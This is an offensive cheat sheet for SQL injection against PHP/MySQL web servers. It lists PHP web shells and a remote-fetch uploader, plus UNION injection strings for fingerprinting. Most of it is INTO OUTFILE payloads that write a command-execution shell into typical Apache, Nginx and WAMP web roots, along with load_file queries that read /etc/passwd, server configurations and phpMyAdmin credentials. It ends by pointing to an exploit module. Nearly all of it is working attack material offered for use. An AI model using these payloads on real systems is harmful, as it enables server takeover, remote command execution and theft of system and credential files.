INTO OUTFILE & SQL Injection Cheat sheet

1. // SiMPLE UPLOADER:
2. <?php echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='filele' size='44'><input type='submit'></form>";@copy($_FILES['filele']['tmp_name'],$_FILES['filele']['name']);?>
3.  
4. <?php fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); ?>
5. cmd.php?o=shellname.php&i=shit.txt
6.  
7. // CMD:
8. <? system($_GET['c']); ?>
9.  
10. // WEBSERVER iNFO:
11. <? phpinfo(); ?>
12.  
13. // SQL QUERY:
14. <? ... $result = mysql_query($_GET['query']); … ?>
15.  
16. ---
17.  
18. GATHERiNG iNFORMATiONS:
19. MySQL 4: 0′ UNION SELECT load_file(’a’),null/*
20. MySQL 5: 0′ UNION SELECT @@datadir,null/*
21. DB NAME: 0′ UNION SELECT database(),null/*
22. ERROR..: 0′ AND 1=’0
23. SELECT @@hostname;
24. SELECT @@datadir;
25. SELECT @@version;
26.  
27. ---
28.  
29. WAMP:
30. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/cmd.php"
31. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/phpmyadmin/cmd.php"
32. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "C:\wamp\htdocs\cmd.php"
33. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/xampp/cmd.php"
34. DEDiCATED/TYPiCAL:
35. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
36. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
37. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/web1/html/cmd.php"
38. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/htdocs/cmd.php"
39. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/localhost/htdocs/cmd.php"
40. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/vhosts/sitename/httpdocs/cmd.php"
41.  
42. NGiNX:
43. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/etc/nginx/sites-available/default/cmd.php"
44. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/html/cmd.php"
45. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/share/nginx/html/cmd.php"
46. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/cmd.php"
47. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/nginx/htmlcmd.php"
48. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/nginx-default/cmd.php"
49. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/cmd.php"
50. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
51. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/home/wwwroot/default/cmd.php"
52. ---
53. SELECT load_file('/usr/local/nginx/conf/nginx.conf')
54. SELECT load_file('/etc/init.d/nginx')
55. SELECT load_file('/etc/passwd')
56. SELECT load_file('/etc/networks')
57. SELECT load_file('/etc/hosts')
58. SELECT HEX(LOAD_FILE('/var/log/wtmp'))
59.  
60. APACHE:
61. SELECT load_file('/etc/init.d/apache')
62. SELECT load_file('/etc/init.d/apache2')
63. SELECT load_file('/etc/httpd/httpd.conf')
64. SELECT load_file('/etc/apache/apache.conf')
65. SELECT load_file('/etc/apache/httpd.conf')
66. SELECT load_file('/etc/apache2/apache2.conf')
67. SELECT load_file('/etc/apache2/httpd.conf')
68. SELECT load_file('/usr/local/apache2/conf/httpd.conf')
69. SELECT load_file('/usr/local/apache/conf/httpd.conf')
70. SELECT load_file('/opt/apache/conf/httpd.conf')
71. SELECT load_file('/home/apache/httpd.conf')
72. SELECT load_file('/home/apache/conf/httpd.conf')
73. SELECT load_file('/etc/apache2/sites-available/default')
74. SELECT load_file('/etc/apache2/vhosts.d/default_vhost.include')
75.  
76. PMA:
77. SELECT load_file( '/phpmyadmin/config.inc.php' )
78.  
79. ---
80.  
81. SPLOiTZ:
82. http://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_preg_replace